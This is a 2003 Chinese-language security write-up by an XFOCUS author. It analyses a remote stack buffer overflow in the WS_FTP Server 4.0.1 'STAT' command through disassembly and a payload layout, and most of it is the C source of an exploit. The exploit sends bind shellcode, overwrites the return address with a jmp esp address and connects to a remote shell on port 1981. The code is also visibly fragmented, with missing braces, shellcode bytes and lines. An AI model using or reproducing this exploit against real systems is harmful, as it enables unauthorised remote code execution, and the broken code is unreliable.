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WS_FTP FTPD "STAT"命令远程溢出分析

作者:eyas (eyas_at_xfocus.org)

文章提交:eyas (eyas_at_xfocus.org)

WS_FTP FTPD "STAT"命令远程溢出分析

Author   : eyas<eyas@xfocus.org>
Created  : 2003-10-08
Updated  : 2003-10-22


    以下分析基于WS_FTP Server 4.0.1.EVAL (47156314)版本,只分析“STAT”命令溢出



loc_41200D <- [0]
    |_ sub_41B523
        |_ sub_424BC1
            |_ lstrlenA <- [1]
            |_ sub_424DD8
                |_ sub_42D75F
                    |_ lstrcpyA <- [2]

.text:0041200D loc_41200D:                            
.text:0041200D                 push    offset aStat_0
.text:00412012                 mov     ecx, [ebp+8]
.text:00412015                 push    ecx
.text:00412016                 call    __strcmpi
.text:0041201B                 add     esp, 8
.text:0041201E                 test    eax, eax
.text:00412020                 jnz     short loc_41202F
.text:00412022                 mov     ecx, [ebp-4]
.text:00412025                 call    sub_41B523
.text:0041202A                 jmp     loc_412775

[1]长度判断,file full path name 长度不能超过0x200
.text:00424D4A                 mov     eax, [ebp+lpString2] ; our_buff
.text:00424D4D                 push    eax             ; lpString
.text:00424D4E                 call    ds:lstrlenA
.text:00424D54                 mov     ecx, [ebp+var_8] ; get path len
.text:00424D57                 add     ecx, eax        ; get total len
.text:00424D59                 mov     [ebp+var_8], ecx
.text:00424D5C                 mov     edx, [ebp+var_8]
//total len compare with 0x200
.text:00424D5F                 cmp     edx, [ebp+arg_10] ;
.text:00424D62                 jle     short loc_424D69 //<- need jmp
.text:00424D64                 mov     eax, [ebp+var_4]
.text:00424D67                 jmp     short loc_424DD2  //<- exit!

[2]file full path name copy to stack buffer,overflow!!
.text:0042D7C3                 mov     eax, [ebp+8]  //<- file full path name
.text:0042D7C6                 push    eax             ; lpString2
.text:0042D7C7                 lea     ecx, [ebp-0x118]
.text:0042D7CD                 push    ecx             ; lpString1
.text:0042D7CE                 call    ds:lstrcpyA
.text:0042DD9B                 retn    8


存放sc的空间都不大,放个得到cmd shell的sc是不够的。除非搞个tiny的shellcode。

    这个有点象IIS WEBDAV溢出的利用,不过这比WEBDAV简单得多。

ws_ftp搞当掉,而且在猜中的同时准确的把jmp esp的地址覆盖在函数的返回地址上。


                     |                                                |
    |path|pad1|sc1|jmp 0x2c|nop(0x14)|ret|nop(8)|jmp back(5)|nop(7)|sc2|pad2|
                |                                      |
    |<--------- 0x118+4 bytes ------>|<------- 0x200-1-0x118-4 bytes ------>|

1) path不是我们发送的。
2) 函数ret的时候是retn 8,所以要有nop(8)。
3) 溢出后,函数有两个变量会被改变,所以要有nop(0x14)来跳过。
4) nop(7) for what? I don't tell you. ^_^

That's ALL!

/* x-ws_ftp.c - x86/win32 WS_FTP FTPD "STAT" command remote
*  stack buffer overflow exploit
* (C) COPYRIGHT XFOCUS Security Team, 2003
* All Rights Reserved
* -----------------------------------------------------------------------
* Author   : eyas <eyas@xfocus.org>
*          : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version  : 1.0
* Test     : Windows 2000 server EN
*                + WS_FTP Server 4.0.1.EVAL (46006050)
* Notes    : This vul discover by Dvdman@l33tsecurity.com!
             To exploit this vul, you must have a account can login into ws_ftp.
* Greets   : dvdman and all member of XFOCUS Security Team.
* Complie  : cl x-ws_ftp.c
* Usage       : x-ws_ftp.exe <-i ip> <-t type> <-u user> <-p pass> [-l pathlen] [-P port]
*             [type]
*             0       win2k sp4 user32.dll
*             Add more targets's jmp esp addr by yourself,
*             and then pls email a copy to me, thanks. :)
* Date     : 2003-10-08
* Revised  :
* Revise History:
* ------- start rip from dvdman's exp -----------------
* VULN VERSIONS: <= X2 WS_FTP Server 4.0.1 (1323562169)
* -------- rip end ------------------------------------
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32")

#define    maxlen                (0x200-1)//能够触发溢出的最大长度
#define    overpoint            (0x118+4)//溢出点
#define    sc_jmp_addr_offset    (0xa4+22)//sc中存放jmp addr的offset
#define    mini_path            0xf//最短路径

#define    ERR_EXP_OK            0
#define    ERR_EXP_CONNECT        -1
#define    ERR_EXP_FAILED        1

#define    version        "1.0"
//modify it by yourself
    DWORD    dwJMP;
    char    *szDescription;
}targets[] =
    {0x77E14C29, "win2k sp4 user32.dll"},

//total = 366 (0x16E) bytes (xor with 0x93)
unsigned char sc_bind_1981[]=
//decoder 22 bytes ->动态定位需解码sc地址
//sc_bind_1981 for 2k/xp/2003 by ey4s
//speacial version for ws_ftp base on v1.03.10.07
//XOR with 0x93 (367 0x16F bytes)
//decode end sign

unsigned char *szSend[3];
unsigned char szSTAT[0x1000];
int        iType;
int        iPort=21;
char    *ip=NULL, *pUser=NULL, *pPass=NULL;
char    user[128],pass[128];

void shell (int sock);
void usage(char *p);
int    SendExploit(int iPathLen);
void main(int argc, char **argv)
    int        i, iPathLen=0, ret;

    printf( "WS_FTP FTPD remote stack buffer overflow exp v%s\n"
            "This version can exploit WS_FTP Server 4.0.1.EVAL\n"
            "Vul discover by Dvdman@l33tsecurity.com\n"
            "Code by eyas@xfocus.org\n"
            "Create: 2003-10-08\n", version);

    if(argc < 9)

        if(strlen(argv[i]) != 2)
        if(i == argc-1)
            case 'i':
            case 't':
                iType = atoi(argv[i+1]);
            case 'P':
            case 'p':
                pPass = argv[i+1];
            case 'u':
            case 'l':

    if((!ip) || (!user) || (!pass))
        printf("[-] Invalid parameter.\n");
    if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
        printf("[-] Invalid type.\n");

    if( (iPathLen>0) && (iPathLen<mini_path) )
        printf("[-] Hey, guy, mini path is %d.\n", mini_path);
    _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
    _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
    szSend[0] = user;//user
    szSend[1] = pass;//pass
    szSend[2] = szSTAT;

            ret = SendExploit(i);
            case ERR_EXP_FAILED:
            case ERR_EXP_CONNECT:
            case ERR_EXP_OK:
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
    int     l;
    char    buf[512];
    struct    timeval time;
    unsigned long    ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1)
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
                printf ("[-] Connection closed.\n");
            l = write (1, buf, l);
            if (l <= 0)
                printf ("[-] Connection closed.\n");
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
                printf("[-] Connection closed.\n");
            l = send(sock, buf, l, 0);
            if (l <= 0)
                printf("[-] Connection closed.\n");
void usage(char *p)
    int    i;
    printf( "Usage: %s <-i ip> <-t type> <-u user> <-p pass> [-l pathlen] [-P port]\n"
            "[type]\n", p);
        printf("%d\t%s\n", i, targets[i].szDescription);
int    SendExploit(int iPathLen)
    struct sockaddr_in sa, server;
    WSADATA    wsd;
    SOCKET    s,s2;
    int        i,iErr, ret, pad1,pad2;
    char    szRecvBuff[0x1000];
    int        retcode = ERR_EXP_CONNECT;

    printf("\n[+] -=-= Try type %d, path %d. -=-=\n", iType, iPathLen);

    memcpy(&sc_bind_1981[sc_jmp_addr_offset], &targets[iType].dwJMP, 4);
    memset(szSTAT, 0, sizeof(szSTAT));
    strcpy(szSTAT, "STAT ");
    pad1 = overpoint - sc_jmp_addr_offset - iPathLen;
        printf( "[-] You can't try any more, path reach the max vaule.\n"
                "    If you want to try longer path, change the sc by
        strcat(szSTAT, "a");
    strcat(szSTAT, sc_bind_1981);
    pad2 = maxlen - overpoint;
    pad2 -= (sizeof(sc_bind_1981)-1-sc_jmp_addr_offset);
        printf("[-] shellcode too long.\n");
        strcat(szSTAT, "b");
    strcat(szSTAT, "\r\n");
    if(strlen(szSTAT) >= sizeof(szSTAT))
        printf("[-] stack buffer overflow.\n");
        if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
            printf("[-] WSAStartup error:%d\n", WSAGetLastError());

        s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(s == INVALID_SOCKET)
            printf("[-] Create socket failed:%d",GetLastError());


        iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
        if(iErr == SOCKET_ERROR)
            printf("[-] connect to target:21 error:%d\n", GetLastError());
        printf("[+] connect to %s:%d success.\n", ip, iPort);
            memset(szRecvBuff, 0, sizeof(szRecvBuff));
            iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
            if(iErr == SOCKET_ERROR)
                printf("[-] recv buffer error:%d.\n", WSAGetLastError());
            printf("[+] Recv: %s", szRecvBuff);
            iErr = send(s, szSend[i], strlen(szSend[i]),0);
            if(iErr == SOCKET_ERROR)
                printf("[-] send buffer error:%d.\n", WSAGetLastError());
                printf("[+] Send shellcode %d(0x%X) bytes.\n", iErr, iErr);
                printf("[+] Send: %s", szSend[i]);
        printf("[+] Wait from shell.\n");
        s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        server.sin_family = AF_INET;
        server.sin_port = htons(1981);
        ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
            printf("[-] Exploit seem failed.\n");
            retcode = ERR_EXP_FAILED;
        printf("[+] Exploit success! Have fun! :)\n");
        retcode = ERR_EXP_OK;
        if(s != INVALID_SOCKET) closesocket(s);
        if(s2 != INVALID_SOCKET) closesocket(s);
    return    retcode;